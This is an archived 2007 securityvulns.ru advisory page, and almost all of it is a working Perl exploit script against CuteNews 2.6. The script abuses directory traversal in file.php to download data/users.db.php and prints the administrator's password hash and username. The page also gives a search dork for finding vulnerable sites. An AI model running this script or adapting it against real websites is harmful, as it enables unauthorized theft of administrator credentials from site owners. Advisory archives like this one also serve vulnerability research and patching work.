Computer Security

Security Advisory: CuteNews Arbitrary File Download AllVersion
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  CCMS v3.1 Demo <= SQL Injection Vulnerability 0day

  New Local file include, Directory traversal and Full path disclosure in WordPress

From:pawel2827_(at)_gmail.com <pawel2827_(at)_gmail.com>
Date:30.12.2007
Subject:CuteNews Arbitrary File Download AllVersion

!/usr/bin/perl
#Found by Pr0metheuS
#Coded by Pr0metheuS
#CuteNews 2.6 ( module file.php )
#Gr33tz-TeaM
#Dork : inurl:/cutenews/file.php
use LWP::UserAgent;
if(@ARGV!=2){
   print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
   print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";
   print "-=-=-= By Pr0metheuS -=-=-=-=-\n";
   print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";
   print "-=-=-= Gr33tz To : -=-=-=-=-\n";
   print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";
   print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
   print "USAGE : perl $0 <SITE> <PATH>\n";
exit;
}
($SITE,$PATH)=@ARGV;
$ua = new LWP::UserAgent;
$ua->agent("Mozilla/8.0");
$ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => "$SITE$PATH/file.php?file=../../data/users.db.php");
$req->header('Accept' => 'text/html');
$res = $ua->request($req);
$con = $res->content;
if($res->is_success){
if($con =~ /([0-9a-fA-F]{32})/){
   $hash = $1;
   print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
   print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";
   print "-=-=-= By Pr0metheuS -=-=-=-=-\n";
   print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";
   print "-=-=-= Gr33tz To : -=-=-=-=-\n";
   print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";
   print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
   print "_____________________________\n";
   print "[+] Exploit Work!\n";
   print "[+] Admin Pass : ".$hash."\n";
    
$ua2 = new LWP::UserAgent;
$ua2->agent("Mozilla/8.0");
$ua2 = LWP::UserAgent->new;
my $req2 = HTTP::Request->new(GET => "$SITE$PATH/file.php?file=../../data/users.db.php");
$req2->header('Accept' => 'text/html');
$res2 = $ua2->request($req2);
$con2 = $res2->content;
if($con2 =~ /\|.\|(.*)\|$hash\|/){
   $user = $1;
       print "[+] Admin Username : ".$user."\n";
           }        
}
else{
   print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
   print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";
   print "-=-=-= By Pr0metheuS -=-=-=-=-\n";
   print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";
   print "-=-=-= Gr33tz To : -=-=-=-=-\n";
   print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";
   print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
   print "_____________________________\n";
   print "[+] Connect failed..\n";
}
}
else{
   print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
   print "-=-=-= CuteNews Arbitrary File Download -=-=-=-=-\n";
   print "-=-=-= By Pr0metheuS -=-=-=-=-\n";
   print "-=-=-= Gr33tz - TeaM -=-=-=-=-\n";
   print "-=-=-= Gr33tz To : -=-=-=-=-\n";
   print "-=-=-= pawel2827, d3d!k, J4Z0, chez, fir3 -=-=-=-=-\n";
   print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
   print "_____________________________\n";
   print "[+] Exploit Failed..\n";
}
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru